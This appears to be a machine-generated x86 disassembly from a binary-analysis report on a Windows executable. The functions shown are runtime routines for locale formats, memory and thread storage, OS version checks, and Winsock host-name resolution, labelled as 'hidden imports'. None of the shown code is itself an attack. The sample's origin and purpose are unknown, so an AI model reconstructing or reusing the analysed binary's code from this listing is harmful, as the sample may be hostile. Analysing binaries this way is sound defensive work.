0040B7F6 call 004061ECh xrefs 0040B7EF
0040B7FB mov ebx, eax
0040B7FD lea eax, dword ptr [ebp-10h]
0040B800 push eax
0040B801 xor ecx, ecx
0040B803 mov edx, 00000014h
0040B808 mov eax, ebx
0040B80A call 0040A10Ch
0040B80F mov edx, dword ptr [ebp-10h]
0040B812 mov eax, 0042C678h
0040B817 call 00404430h
0040B81C lea eax, dword ptr [ebp-14h]
0040B81F push eax
0040B820 mov ecx, 0040BAA0h
0040B825 mov edx, 0000001Bh
0040B82A mov eax, ebx
0040B82C call 0040A10Ch
0040B831 mov eax, dword ptr [ebp-14h]
0040B834 xor edx, edx
0040B836 call 00407608h
0040B83B mov byte ptr [0042C67Ch], al
0040B840 lea eax, dword ptr [ebp-18h]
0040B843 push eax
0040B844 mov ecx, 0040BAA0h
0040B849 mov edx, 0000001Ch
0040B84E mov eax, ebx
0040B850 call 0040A10Ch
0040B855 mov eax, dword ptr [ebp-18h]
0040B858 xor edx, edx
0040B85A call 00407608h
0040B85F mov byte ptr [0042C67Dh], al
0040B864 mov cl, 2Ch
0040B866 mov edx, 0000000Fh
0040B86B mov eax, ebx
0040B86D call 0040A158h
0040B872 mov byte ptr [0042C67Eh], al
0040B877 mov cl, 2Eh
0040B879 mov edx, 0000000Eh
0040B87E mov eax, ebx
0040B880 call 0040A158h
0040B885 mov byte ptr [0042C67Fh], al
0040B88A lea eax, dword ptr [ebp-1Ch]
0040B88D push eax
0040B88E mov ecx, 0040BAA0h
0040B893 mov edx, 00000019h
0040B898 mov eax, ebx
0040B89A call 0040A10Ch
0040B89F mov eax, dword ptr [ebp-1Ch]
0040B8A2 xor edx, edx
0040B8A4 call 00407608h
0040B8A9 mov byte ptr [0042C680h], al
0040B8AE mov cl, 2Fh
0040B8B0 mov edx, 0000001Dh
0040B8B5 mov eax, ebx
0040B8B7 call 0040A158h
0040B8BC mov byte ptr [0042C681h], al
0040B8C1 lea eax, dword ptr [ebp-24h]
0040B8C4 push eax
0040B8C5 mov ecx, 0040BAACh ASCII "m/d/yy"
0040B8CA mov edx, 0000001Fh
0040B8CF mov eax, ebx
0040B8D1 call 0040A10Ch
0040B8D6 mov eax, dword ptr [ebp-24h]
0040B8D9 lea edx, dword ptr [ebp-20h]
0040B8DC call 0040A444h
0040B8E1 mov edx, dword ptr [ebp-20h]
0040B8E4 mov eax, 0042C684h
0040B8E9 call 00404430h
0040B8EE lea eax, dword ptr [ebp-2Ch]
0040B8F1 push eax
0040B8F2 mov ecx, 0040BABCh ASCII "mmmm d, yyyy"
0040B8F7 mov edx, 00000020h
0040B8FC mov eax, ebx
0040B8FE call 0040A10Ch
0040B903 mov eax, dword ptr [ebp-2Ch]
0040B906 lea edx, dword ptr [ebp-28h]
0040B909 call 0040A444h
0040B90E mov edx, dword ptr [ebp-28h]
0040B911 mov eax, 0042C688h
0040B916 call 00404430h
0040B91B mov cl, 3Ah
0040B91D mov edx, 0000001Eh
0040B922 mov eax, ebx
0040B924 call 0040A158h
0040B929 mov byte ptr [0042C68Ch], al
0040B92E lea eax, dword ptr [ebp-30h]
0040B931 push eax
0040B932 mov ecx, 0040BAD4h
0040B937 mov edx, 00000028h
0040B93C mov eax, ebx
0040B93E call 0040A10Ch
0040B943 mov edx, dword ptr [ebp-30h]
0040B946 mov eax, 0042C690h
0040B94B call 00404430h
0040B950 lea eax, dword ptr [ebp-34h]
0040B953 push eax
0040B954 mov ecx, 0040BAE0h
0040B959 mov edx, 00000029h
0040B95E mov eax, ebx
0040B960 call 0040A10Ch
0040B965 mov edx, dword ptr [ebp-34h]
0040B968 mov eax, 0042C694h
0040B96D call 00404430h
0040B972 lea eax, dword ptr [ebp-08h]
0040B975 call 004043DCh
0040B97A lea eax, dword ptr [ebp-0Ch]
0040B97D call 004043DCh
0040B982 lea eax, dword ptr [ebp-38h]
0040B985 push eax
0040B986 mov ecx, 0040BAA0h
0040B98B mov edx, 00000025h
0040B990 mov eax, ebx
0040B992 call 0040A10Ch
0040B997 mov eax, dword ptr [ebp-38h]
0040B99A xor edx, edx
0040B99C call 00407608h
0040B9A1 test eax, eax
0040B9A3 jne 0040B9B4h
0040B9A5 lea eax, dword ptr [ebp-04h]
0040B9A8 mov edx, 0040BAECh
0040B9AD call 00404474h
0040B9B2 jmp 0040B9C1h
0040B9B4 lea eax, dword ptr [ebp-04h] xrefs 0040B9A3
0040B9B7 mov edx, 0040BAF8h
0040B9BC call 00404474h
0040B9C1 lea eax, dword ptr [ebp-3Ch] xrefs 0040B9B2
0040B9C4 push eax
0040B9C5 mov ecx, 0040BAA0h
0040B9CA mov edx, 00000023h
0040B9CF mov eax, ebx
0040B9D1 call 0040A10Ch
0040B9D6 mov eax, dword ptr [ebp-3Ch]
0040B9D9 xor edx, edx
0040B9DB call 00407608h
0040B9E0 test eax, eax
0040B9E2 jne 0040BA23h
0040B9E4 lea eax, dword ptr [ebp-40h]
0040B9E7 push eax
0040B9E8 mov ecx, 0040BAA0h
0040B9ED mov edx, 00001005h
0040B9F2 mov eax, ebx
0040B9F4 call 0040A10Ch
0040B9F9 mov eax, dword ptr [ebp-40h]
0040B9FC xor edx, edx
0040B9FE call 00407608h
0040BA03 test eax, eax
0040BA05 jne 0040BA16h
0040BA07 lea eax, dword ptr [ebp-0Ch]
0040BA0A mov edx, 0040BB04h ASCII " AMPM"
0040BA0F call 00404474h
0040BA14 jmp 0040BA23h
0040BA16 lea eax, dword ptr [ebp-08h] xrefs 0040BA05
0040BA19 mov edx, 0040BB14h ASCII "AMPM "
0040BA1E call 00404474h
0040BA23 push dword ptr [ebp-08h] xrefs 0040B9E2, 0040BA14
0040BA26 push dword ptr [ebp-04h]
0040BA29 push 0040BB24h ASCII ":mm"
0040BA2E push dword ptr [ebp-0Ch]
0040BA31 mov eax, 0042C698h
0040BA36 mov edx, 00000004h
0040BA3B call 00404738h
0040BA40 push dword ptr [ebp-08h]
0040BA43 push dword ptr [ebp-04h]
0040BA46 push 0040BB30h ASCII ":mm:ss"
0040BA4B push dword ptr [ebp-0Ch]
0040BA4E mov eax, 0042C69Ch
0040BA53 mov edx, 00000004h
0040BA58 call 00404738h
0040BA5D mov cl, 2Ch
0040BA5F mov edx, 0000000Ch
0040BA64 mov eax, ebx
0040BA66 call 0040A158h
0040BA6B mov byte ptr [0042C746h], al
0040BA70 xor eax, eax
0040BA72 pop edx
0040BA74 pop ecx Count = 2
0040BA75 mov dword ptr fs:[eax], edx
0040BA78 push 0040BA92h
0040BA7D lea eax, dword ptr [ebp-40h] xrefs 0040BA90
0040BA80 mov edx, 00000010h
0040BA85 call 00404400h
0040BA8A ret function end
Function 0040B380, API count: 1, instr count: 12
APIs
  • CharNextA.USER32, ref: 0040B38D
Address Instruction Meta Information
0040B380 push ebx xrefs 0040B413, 00409056, 0040B3D9
0040B381 mov ebx, eax
0040B383 cmp byte ptr [0042C744h], 00000000h
0040B38A je 0040B396h
0040B38C push ebx
0040B38D call 004062ACh CharNextA@USER32.DLL (Import)
0040B392 sub eax, ebx
0040B394 pop ebx
0040B395 ret function end
0040B396 mov eax, 00000001h xrefs 0040B38A
0040B39B pop ebx
0040B39C ret function end
Function 00414C90, API count: 1, instr count: 39
APIs
  • FreeLibrary.KERNEL32, ref: 00414CF4
Address Instruction Meta Information
00414C90 push ebp xrefs 0041C80A
00414C91 mov ebp, esp
00414C93 mov eax, dword ptr [0042C8A4h] 00960A4C
00414C98 call 00413914h
00414C9D xor eax, eax
00414C9F push ebp
00414CA0 push 00414D18h
00414CA5 push dword ptr fs:[eax]
00414CA8 mov dword ptr fs:[eax], esp
00414CAB dec dword ptr [0042B460h]
00414CB1 cmp dword ptr [0042B460h], 00000000h
00414CB8 jnl 00414CC1h
00414CBA xor eax, eax
00414CBC mov dword ptr [0042B460h], eax
00414CC1 cmp dword ptr [0042B460h], 00000000h xrefs 00414CB8
00414CC8 jne 00414D00h
00414CCA cmp dword ptr [0042B464h], 00000000h
00414CD1 je 00414CE5h
00414CD3 mov eax, dword ptr [0042B464h] 71AB0000
00414CD8 push eax
00414CD9 call 00406154h
00414CDE xor eax, eax
00414CE0 mov dword ptr [0042B464h], eax
00414CE5 cmp dword ptr [0042B468h], 00000000h xrefs 00414CD1
00414CEC je 00414D00h
00414CEE mov eax, dword ptr [0042B468h] 00000000
00414CF3 push eax
00414CF4 call 00406154h FreeLibrary@KERNEL32.DLL (Hidden Import)
00414CF9 xor eax, eax
00414CFB mov dword ptr [0042B468h], eax
00414D00 xor eax, eax xrefs 00414CC8, 00414CEC
00414D02 pop edx
00414D04 pop ecx Count = 2
00414D05 mov dword ptr fs:[eax], edx
00414D08 push 00414D1Fh
00414D0D mov eax, dword ptr [0042C8A4h] 00960A4C xrefs 00414D1D
00414D12 call 0041391Ch
00414D17 ret function end
Function 00413A10, API count: 1, instr count: 18
APIs
  • getsockname.WS2_32, ref: 00413A2D
Address Instruction Meta Information
00413A10 push ebx xrefs 004185C5
00413A11 push esi
00413A12 push ecx
00413A13 mov ebx, edx
00413A15 mov esi, eax
00413A17 mov dword ptr [esp], 0000001Ch
00413A1E mov eax, ebx
00413A20 xor ecx, ecx
00413A22 mov edx, dword ptr [esp]
00413A25 call 00403030h
00413A2A push esp
00413A2B push ebx
00413A2C push esi
00413A2D call dword ptr [0042B42Ch] getsockname@WS2_32.DLL (Hidden Import)
00413A33 pop edx
00413A34 pop esi
00413A35 pop ebx
00413A36 ret function end
Function 00405F94, API count: 1, instr count: 4
APIs
  • LocalAlloc.KERNEL32, ref: 00405F97
Address Instruction Meta Information
00405F94 push eax xrefs 00405FC9
00405F95 push 00000040h
00405F97 call 00405F7Ch LocalAlloc@KERNEL32.DLL (Hidden Import)
00405F9C ret function end
Function 00413184, API count: 0, instr count: 60
Address Instruction Meta Information
00413184 push ebp xrefs 00422535, 004296AD
00413185 mov ebp, esp
00413187 add esp, FFFFFFF0h
0041318A push ebx
0041318B push esi
0041318C xor ebx, ebx
0041318E mov dword ptr [ebp-10h], ebx
00413191 test dl, dl
00413193 je 0041319Dh
00413195 add esp, FFFFFFF0h
00413198 call 00403950h
0041319D mov ebx, ecx xrefs 00413193
0041319F mov byte ptr [ebp-01h], dl
004131A2 mov esi, eax
004131A4 xor eax, eax
004131A6 push ebp
004131A7 push 0041322Eh
004131AC push dword ptr fs:[eax]
004131AF mov dword ptr fs:[eax], esp
004131B2 xor edx, edx
004131B4 mov eax, esi
004131B6 call 004036D8h
004131BB call 00412F24h
004131C0 mov byte ptr [esi+0Eh], bl
004131C3 mov byte ptr [esi+0Ch], bl
004131C6 push esi
004131C7 push 00000004h
004131C9 lea eax, dword ptr [esi+08h]
004131CC push eax
004131CD mov ecx, 004130DCh
004131D2 xor edx, edx
004131D4 xor eax, eax
004131D6 call 00404390h
004131DB mov ebx, eax
004131DD mov dword ptr [esi+04h], ebx
004131E0 test ebx, ebx
004131E2 jne 00413218h
004131E4 call 004061ACh
004131E9 lea edx, dword ptr [ebp-10h]
004131EC call 0040A0C0h
004131F1 mov eax, dword ptr [ebp-10h]
004131F4 mov dword ptr [ebp-0Ch], eax
004131F7 mov byte ptr [ebp-08h], 0000000Bh
004131FB lea eax, dword ptr [ebp-0Ch]
004131FE push eax
004131FF push 00000000h
00413201 mov ecx, dword ptr [0042B93Ch] 0040F614
00413207 mov dl, 01h
00413209 mov eax, dword ptr [004100F0h] 0041013C
0041320E call 0040A9C0h
00413213 call 00403DB8h
00413218 xor eax, eax xrefs 004131E2
0041321A pop edx
0041321C pop ecx Count = 2
0041321D mov dword ptr fs:[eax], edx
00413220 push 00413235h
00413225 lea eax, dword ptr [ebp-10h] xrefs 00413233
00413228 call 004043DCh
0041322D ret function end
Function 00419A64, API count: 1, instr count: 51
APIs
  • select.WS2_32, ref: 00419AC3
Address Instruction Meta Information
00419A64 push ebx
00419A65 push esi
00419A66 push edi
00419A67 add esp, FFFFFEF4h
00419A6D mov ecx, edx
00419A6F mov ebx, eax
00419A71 mov eax, ecx
00419A73 mov esi, 000003E8h
00419A78 cdq
00419A79 idiv esi
00419A7B imul eax, edx, 000003E8h
00419A81 mov dword ptr [esp+04h], eax
00419A85 mov eax, ecx
00419A87 mov esi, 000003E8h
00419A8C cdq
00419A8D idiv esi
00419A8F mov dword ptr [esp], eax
00419A92 mov eax, esp
00419A94 inc ecx
00419A95 jne 00419A99h
00419A97 xor eax, eax
00419A99 lea esi, dword ptr [ebx+00000095h] xrefs 00419A95
00419A9F lea edi, dword ptr [esp+08h]
00419AA3 mov ecx, 00000041h
00419AA8 rep movsd
00419AAA push eax
00419AAD push 00000000h Count = 2
00419AAF lea eax, dword ptr [esp+14h]
00419AB3 push eax
00419AB4 mov eax, dword ptr [ebx+000001B4h]
00419ABA inc eax
00419ABB push eax
00419ABC mov eax, dword ptr [0042B978h] 0042B448
00419AC1 mov eax, dword ptr [eax]
00419AC3 call eax select@WS2_32.DLL (Hidden Import)
00419AC5 mov esi, eax
00419AC7 mov edx, esi
00419AC9 mov eax, ebx
00419ACB mov ecx, dword ptr [eax]
00419ACD call dword ptr [ecx+78h]
00419AD0 cmp dword ptr [ebx+000001B8h], 00000000h
00419AD7 je 00419ADBh
00419AD9 xor esi, esi
00419ADB test esi, esi xrefs 00419AD7
00419ADD setnle al
00419AE0 add esp, 0000010Ch
00419AE6 pop edi
00419AE7 pop esi
00419AE8 pop ebx
00419AE9 ret function end
Function 00404358, API count: 0, instr count: 25
Address Instruction Meta Information
00404358 push ebp
00404359 mov ebp, esp
0040435B call 0040366Ch
00404360 push ebp
00404361 xor ecx, ecx
00404363 push 00403F1Ch
00404368 mov edx, dword ptr fs:[ecx]
0040436B push edx
0040436C mov dword ptr fs:[ecx], esp
0040436F mov eax, dword ptr [ebp+08h]
00404372 mov ecx, dword ptr [eax+04h]
00404375 mov edx, dword ptr [eax]
00404377 push ecx
00404378 push edx
00404379 call 004026E8h
0040437E pop edx
0040437F pop eax
00404380 call edx
00404382 xor edx, edx
00404384 pop ecx
00404385 mov dword ptr fs:[edx], ecx
00404388 pop ecx
0040438A pop ebp Count = 2
0040438B retn 0004h function end
Function 00402E54, API count: 0, instr count: 12
Address Instruction Meta Information
00402E54 push ebp xrefs 00422232
00402E55 mov ebp, esp
00402E57 push ebx
00402E58 mov ebx, dword ptr [ebp+08h]
00402E5B push ebx
00402E5C push 0000D7B2h
00402E61 push 00402DA0h
00402E66 push 00000065h
00402E68 call 00402DA8h
00402E6D pop ebx
00402E6E pop ebp
00402E6F retn 0004h function end
Function 00405FA8, API count: 1, instr count: 22
APIs
    • LocalAlloc.KERNEL32, ref: 00405F97
  • TlsSetValue.KERNEL32, ref: 00405FE5
Address Instruction Meta Information
00405FA8 push ebx xrefs 00406006
00405FA9 call 00405FA0h
00405FAE mov ebx, eax
00405FB0 test ebx, ebx
00405FB2 je 00405FEAh
00405FB4 cmp dword ptr [0042B0C4h], FFFFFFFFh
00405FBB jne 00405FC7h
00405FBD mov eax, 000000E2h
00405FC2 call 0040434Ch
00405FC7 mov eax, ebx xrefs 00405FBB
00405FC9 call 00405F94h
00405FCE test eax, eax
00405FD0 jne 00405FDEh
00405FD2 mov eax, 000000E2h
00405FD7 call 0040434Ch
00405FDC jmp 00405FEAh
00405FDE push eax xrefs 00405FD0
00405FDF mov eax, dword ptr [0042B0C4h] 00000000
00405FE4 push eax
00405FE5 call 00405F8Ch TlsSetValue@KERNEL32.DLL (Hidden Import)
00405FEA pop ebx xrefs 00405FB2, 00405FDC
00405FEB ret function end
Function 0040B5D4, API count: 1, instr count: 39
APIs
    • GetACP.KERNEL32, ref: 0040B59F
  • GetCPInfo.KERNEL32, ref: 0040B5ED
Address Instruction Meta Information
0040B5D4 push ebp xrefs 0040B791, 0040B6DF
0040B5D5 mov ebp, esp
0040B5D7 push ecx
0040B5D8 push ebx
0040B5D9 push esi
0040B5DA push edi
0040B5DB mov edi, dword ptr [ebp+08h]
0040B5DE add edi, FFFFFFECh
0040B5E1 push edi
0040B5E2 mov eax, dword ptr [0042C738h] 00000409
0040B5E7 call 0040B560h
0040B5EC push eax
0040B5ED call 0040617Ch GetCPInfo@KERNEL32.DLL (Hidden Import)
0040B5F2 xor esi, esi
0040B5F4 jmp 0040B61Fh
0040B5F6 mov al, byte ptr [edi+esi+06h] xrefs 0040B62C
0040B5FA mov bl, byte ptr [edi+esi+07h]
0040B5FE sub bl, al
0040B600 jc 0040B61Ch
0040B602 inc ebx
0040B603 mov byte ptr [ebp-01h], al
0040B606 mov al, byte ptr [ebp-01h] xrefs 0040B61A
0040B609 and eax, 000000FFh
0040B60E bts dword ptr [0042B130h], eax
0040B615 inc byte ptr [ebp-01h]
0040B618 dec bl
0040B61A jne 0040B606h
0040B61C add esi, 02h xrefs 0040B600
0040B61F cmp esi, 0Ch xrefs 0040B5F4
0040B622 jnl 0040B62Eh
0040B624 mov al, byte ptr [edi+esi+06h]
0040B628 or al, byte ptr [edi+esi+07h]
0040B62C jne 0040B5F6h
0040B62E pop edi xrefs 0040B622
0040B62F pop esi
0040B630 pop ebx
0040B631 pop ecx
0040B632 pop ebp
0040B633 ret function end
Function 00414078, API count: 5, instr count: 205
APIs
  • inet_addr.WS2_32, ref: 004140CB
  • gethostbyname.WS2_32, ref: 004140F1
  • getaddrinfo.WS2_32, ref: 004141D7
  • getnameinfo.WS2_32, ref: 00414245
  • FreeAddrInfoW.WS2_32, ref: 0041428E
Strings
  • 0.0.0.0, va: 0041430C
  • %d.%d.%d.%d, va: 004142F8
Address Instruction Meta Information
00414078 push ebp xrefs 00419808
00414079 mov ebp, esp
0041407B add esp, FFFFFFA4h
0041407E push ebx
0041407F push esi
00414080 push edi
00414081 xor ebx, ebx
00414083 mov dword ptr [ebp-0Ch], ebx
00414086 mov dword ptr [ebp-10h], ebx
00414089 mov dword ptr [ebp-18h], ebx
0041408C mov ebx, ecx
0041408E mov esi, edx
00414090 mov dword ptr [ebp-04h], eax
00414093 mov eax, dword ptr [ebp-04h]
00414096 call 00404868h
0041409B xor eax, eax
0041409D push ebp
0041409E push 004142E0h
004140A3 push dword ptr fs:[eax]
004140A6 mov dword ptr fs:[eax], esp
004140A9 mov eax, dword ptr [ebp+08h]
004140AC mov edx, dword ptr [eax]
004140AE call dword ptr [edx+44h]
004140B1 mov eax, esi
004140B3 call 00413B74h
004140B8 test al, al
004140BA jne 0041418Fh
004140C0 mov eax, dword ptr [ebp-04h]
004140C3 call 00404878h
004140C8 mov ebx, eax
004140CA push ebx
004140CB call dword ptr [0042B420h] inet_addr@WS2_32.DLL (Hidden Import)
004140D1 inc eax
004140D2 jne 0041417Fh
004140D8 mov eax, dword ptr [0042C8A4h] 00960A4C
004140DD call 00413914h
004140E2 xor edx, edx
004140E4 push ebp
004140E5 push 00414178h
004140EA push dword ptr fs:[edx]
004140ED mov dword ptr fs:[edx], esp
004140F0 push ebx
004140F1 call dword ptr [0042B3E4h] gethostbyname@WS2_32.DLL (Hidden Import)
004140F7 test eax, eax
004140F9 je 00414160h
004140FB mov esi, dword ptr [eax+0Ch]
004140FE xor ebx, ebx
00414100 jmp 00414159h
00414102 mov eax, dword ptr [eax] xrefs 0041415E
00414104 mov dword ptr [ebp-1Ch], eax
00414107 lea eax, dword ptr [ebp-18h]
0041410A push eax
0041410B xor eax, eax
0041410D mov al, byte ptr [ebp-1Ch]
00414110 mov dword ptr [ebp-5Ch], eax
00414113 mov byte ptr [ebp-58h], 00000000h
00414117 xor eax, eax
00414119 mov al, byte ptr [ebp-1Bh]
0041411C mov dword ptr [ebp-54h], eax
0041411F mov byte ptr [ebp-50h], 00000000h
00414123 xor eax, eax
00414125 mov al, byte ptr [ebp-1Ah]
00414128 mov dword ptr [ebp-4Ch], eax
0041412B mov byte ptr [ebp-48h], 00000000h
0041412F xor eax, eax
00414131 mov al, byte ptr [ebp-19h]
00414134 mov dword ptr [ebp-44h], eax
00414137 mov byte ptr [ebp-40h], 00000000h
0041413B lea edx, dword ptr [ebp-5Ch]
0041413E mov ecx, 00000003h
00414143 mov eax, 004142F8h ASCII "%d.%d.%d.%d"
00414148 call 00408048h
0041414D mov edx, dword ptr [ebp-18h]
00414150 mov eax, dword ptr [ebp+08h]
00414153 mov ecx, dword ptr [eax]
00414155 call dword ptr [ecx+38h]
00414158 inc ebx
00414159 mov eax, dword ptr [esi+ebx*4] xrefs 00414100
0041415C test eax, eax
0041415E jne 00414102h
00414160 xor eax, eax xrefs 004140F9
00414162 pop edx
00414164 pop ecx Count = 2
00414165 mov dword ptr fs:[eax], edx
00414168 push 0041429Ch
0041416D mov eax, dword ptr [0042C8A4h] 00960A4C xrefs 0041417D
00414172 call 0041391Ch
00414177 ret function end
0041417F mov edx, dword ptr [ebp-04h] xrefs 004140D2
00414182 mov eax, dword ptr [ebp+08h]
00414185 mov ecx, dword ptr [eax]
00414187 call dword ptr [ecx+38h]
0041418A jmp 0041429Ch
0041418F xor eax, eax xrefs 004140BA
00414191 mov dword ptr [ebp-08h], eax
00414194 xor edx, edx
00414196 push ebp
00414197 push 00414295h
0041419C push dword ptr fs:[edx]
0041419F mov dword ptr fs:[edx], esp
004141A2 lea eax, dword ptr [ebp-3Ch]
004141A5 xor ecx, ecx
004141A7 mov edx, 00000020h
004141AC call 00403030h
004141B1 xor eax, eax
004141B3 mov dword ptr [ebp-38h], eax
004141B6 mov eax, dword ptr [ebp+0Ch]
004141B9 mov dword ptr [ebp-34h], eax
004141BC mov dword ptr [ebp-30h], ebx
004141BF xor eax, eax
004141C1 mov dword ptr [ebp-3Ch], eax
004141C4 lea eax, dword ptr [ebp-08h]
004141C7 push eax
004141C8 lea eax, dword ptr [ebp-3Ch]
004141CB push eax
004141CC push 00000000h
004141CE mov eax, dword ptr [ebp-04h]
004141D1 call 00404878h
004141D6 push eax
004141D7 call dword ptr [0042B44Ch] getaddrinfo@WS2_32.DLL (Hidden Import)
004141DD test eax, eax
004141DF jne 00414277h
004141E5 mov ebx, dword ptr [ebp-08h]
004141E8 jmp 0041426Fh
004141ED cmp esi, 17h xrefs 00414271
004141F0 jne 004141F8h
004141F2 cmp dword ptr [ebx+04h], 02h
004141F6 je 0041426Ch
004141F8 cmp esi, 02h xrefs 004141F0
004141FB jne 00414203h
004141FD cmp dword ptr [ebx+04h], 17h
00414201 je 0041426Ch
00414203 mov edi, 00000401h xrefs 004141FB
00414208 mov dword ptr [ebp-14h], 00000020h
0041420F lea eax, dword ptr [ebp-0Ch]
00414212 mov edx, edi
00414214 call 004049A8h
00414219 lea eax, dword ptr [ebp-10h]
0041421C mov edx, dword ptr [ebp-14h]
0041421F call 004049A8h
00414224 push 0000000Ah
00414226 mov eax, dword ptr [ebp-14h]
00414229 push eax
0041422A mov eax, dword ptr [ebp-10h]
0041422D call 00404878h
00414232 push eax
00414233 push edi
00414234 mov eax, dword ptr [ebp-0Ch]
00414237 call 00404878h
0041423C push eax
0041423D mov eax, dword ptr [ebx+10h]
00414240 push eax
00414241 mov eax, dword ptr [ebx+18h]
00414244 push eax
00414245 call dword ptr [0042B454h] getnameinfo@WS2_32.DLL (Hidden Import)
0041424B test eax, eax
0041424D jne 0041426Ch
0041424F mov eax, dword ptr [ebp-0Ch]
00414252 call 00404878h
00414257 mov edx, eax
00414259 lea eax, dword ptr [ebp-0Ch]
0041425C call 004045D4h
00414261 mov edx, dword ptr [ebp-0Ch]
00414264 mov eax, dword ptr [ebp+08h]
00414267 mov ecx, dword ptr [eax]
00414269 call dword ptr [ecx+38h]
0041426C mov ebx, dword ptr [ebx+1Ch] xrefs 0041424D, 00414201, 004141F6
0041426F test ebx, ebx xrefs 004141E8
00414271 jne 004141EDh
00414277 xor eax, eax xrefs 004141DF
00414279 pop edx
0041427B pop ecx Count = 2
0041427C mov dword ptr fs:[eax], edx
0041427F push 0041429Ch
00414284 cmp dword ptr [ebp-08h], 00000000h xrefs 0041429A
00414288 je 00414294h
0041428A mov eax, dword ptr [ebp-08h]
0041428D push eax
0041428E call dword ptr [0042B450h] FreeAddrInfoW@WS2_32.DLL (Hidden Import)
00414294 ret xrefs 00414288 function end
0041429C mov eax, dword ptr [ebp+08h] xrefs 0041418A
0041429F mov edx, dword ptr [eax]
004142A1 call dword ptr [edx+14h]
004142A4 test eax, eax
004142A6 jne 004142B5h
004142A8 mov edx, 0041430Ch ASCII "0.0.0.0"
004142AD mov eax, dword ptr [ebp+08h]
004142B0 mov ecx, dword ptr [eax]
004142B2 call dword ptr [ecx+38h]
004142B5 xor eax, eax xrefs 004142A6
004142B7 pop edx
004142B9 pop ecx Count = 2
004142BA mov dword ptr fs:[eax], edx
004142BD push 004142E7h
004142C2 lea eax, dword ptr [ebp-18h] xrefs 004142E5
004142C5 call 004043DCh
004142CA lea eax, dword ptr [ebp-10h]
004142CD mov edx, 00000002h
004142D2 call 00404400h
004142D7 lea eax, dword ptr [ebp-04h]
004142DA call 004043DCh
004142DF ret function end
Function 0040B088, API count: 1, instr count: 26
APIs
  • GetVersionExA.KERNEL32, ref: 0040B096
Address Instruction Meta Information
0040B088 add esp, FFFFFF6Ch xrefs 0040C52B
0040B08E mov dword ptr [esp], 00000094h
0040B095 push esp
0040B096 call 004061FCh GetVersionExA@KERNEL32.DLL (Hidden Import)
0040B09B test eax, eax
0040B09D je 0040B0EFh
0040B09F mov eax, dword ptr [esp+10h]
0040B0A3 mov dword ptr [0042B0E8h], eax
0040B0A8 mov eax, dword ptr [esp+04h]
0040B0AC mov dword ptr [0042B0ECh], eax
0040B0B1 mov eax, dword ptr [esp+08h]
0040B0B5 mov dword ptr [0042B0F0h], eax
0040B0BA cmp dword ptr [0042B0E8h], 01h
0040B0C1 jne 0040B0D3h
0040B0C3 mov eax, dword ptr [esp+0Ch]
0040B0C7 and eax, 0000FFFFh
0040B0CC mov dword ptr [0042B0F4h], eax
0040B0D1 jmp 0040B0DCh
0040B0D3 mov eax, dword ptr [esp+0Ch] xrefs 0040B0C1
0040B0D7 mov dword ptr [0042B0F4h], eax
0040B0DC mov eax, 0042B0F8h xrefs 0040B0D1
0040B0E1 lea edx, dword ptr [esp+14h]
0040B0E5 mov ecx, 00000080h
0040B0EA call 0040464Ch
0040B0EF add esp, 00000094h xrefs 0040B09D
0040B0F5 ret function end
Function 00402A1C, API count: 2, instr count: 15
APIs
  • QueryPerformanceCounter.KERNEL32, ref: 00402A20
  • GetTickCount.KERNEL32, ref: 00402A34
Address Instruction Meta Information
00402A1C add esp, FFFFFFF8h xrefs 0042925B, 00429DB1
00402A1F push esp
00402A20 call 00401308h QueryPerformanceCounter@KERNEL32.DLL (Hidden Import)
00402A25 test eax, eax
00402A27 je 00402A34h
00402A29 mov eax, dword ptr [esp]
00402A2C mov dword ptr [0042B008h], eax
00402A31 pop ecx
00402A32 pop edx
00402A33 ret function end
00402A34 call 00401310h GetTickCount@KERNEL32.DLL (Hidden Import) xrefs 00402A27
00402A39 mov dword ptr [0042B008h], eax
00402A3E pop ecx
00402A3F pop edx
00402A40 ret function end
Function 00402B00, API count: 0, instr count: 8
Address Instruction Meta Information
00402B00 push ebx xrefs 00402B1B, 0040307A
00402B01 mov ebx, eax
00402B03 push ebx
00402B04 call 004011A0h
00402B09 dec eax
00402B0A sete al
00402B0D pop ebx
00402B0E ret function end
Function 00404064, API count: 0, instr count: 37
Address Instruction Meta Information
00404064 push ebp xrefs 004040FE
00404065 mov ebp, esp
00404067 push ebx
00404068 push esi
00404069 push edi
0040406A mov eax, dword ptr [0042C638h] 00429CC0
0040406F test eax, eax
00404071 je 004040BEh
00404073 mov esi, dword ptr [eax]
00404075 xor ebx, ebx
00404077 mov edi, dword ptr [eax+04h]
0040407A xor edx, edx
0040407C push ebp
0040407D push 004040AAh
00404082 push dword ptr fs:[edx]
00404085 mov dword ptr fs:[edx], esp
00404088 cmp esi, ebx
0040408A jle 004040A0h
0040408C mov eax, dword ptr [edi+ebx*8] xrefs 0040409E
0040408F inc ebx
00404090 mov dword ptr [0042C63Ch], ebx
00404096 test eax, eax
00404098 je 0040409Ch
0040409A call eax
0040409C cmp esi, ebx xrefs 00404098
0040409E jnle 0040408Ch
004040A0 xor eax, eax xrefs 0040408A
004040A2 pop edx
004040A4 pop ecx Count = 2
004040A5 mov dword ptr fs:[eax], edx
004040A8 jmp 004040BEh
004040BE pop edi xrefs 00404071, 004040A8
004040BF pop esi
004040C0 pop ebx
004040C1 pop ebp
004040C2 ret function end
Function 00405D80, API count: 1, instr count: 31
APIs
  • LoadStringA.USER32, ref: 00405DB1
Address Instruction Meta Information
00405D80 push ebx xrefs 0040A9F3, 0040A1AE, 0040AB91, 0040ABBC, 0040AD35, 0040AE4D, 0040ADF1, 0040AD26, 0040AF20, 0040A99E, 0040411A, 0040D387, 0040D41B, 0040D477, 0040D50B, 0040D567, 0040D697, 0040D6BD, 0040D709, 0040D72F, 0040D7A4, 0040D671, 0040D641, 0040D6E3, 0040D752, 0040D84F, 0041067A, 00410E85
00405D81 push esi
00405D82 add esp, FFFFFC00h
00405D88 mov esi, edx
00405D8A mov ebx, eax
00405D8C test ebx, ebx
00405D8E je 00405DCDh
00405D90 cmp dword ptr [ebx+04h], 00010000h
00405D97 jnl 00405DC3h
00405D99 push 00000400h
00405D9E lea eax, dword ptr [esp+04h]
00405DA2 push eax
00405DA3 mov eax, dword ptr [ebx+04h]
00405DA6 push eax
00405DA7 mov eax, dword ptr [ebx]
00405DA9 mov eax, dword ptr [eax]
00405DAB call 00405328h
00405DB0 push eax
00405DB1 call 00401288h LoadStringA@USER32.DLL (Hidden Import)
00405DB6 mov ecx, eax
00405DB8 mov edx, esp
00405DBA mov eax, esi
00405DBC call 004044CCh
00405DC1 jmp 00405DCDh
00405DC3 mov eax, esi xrefs 00405D97
00405DC5 mov edx, dword ptr [ebx+04h]
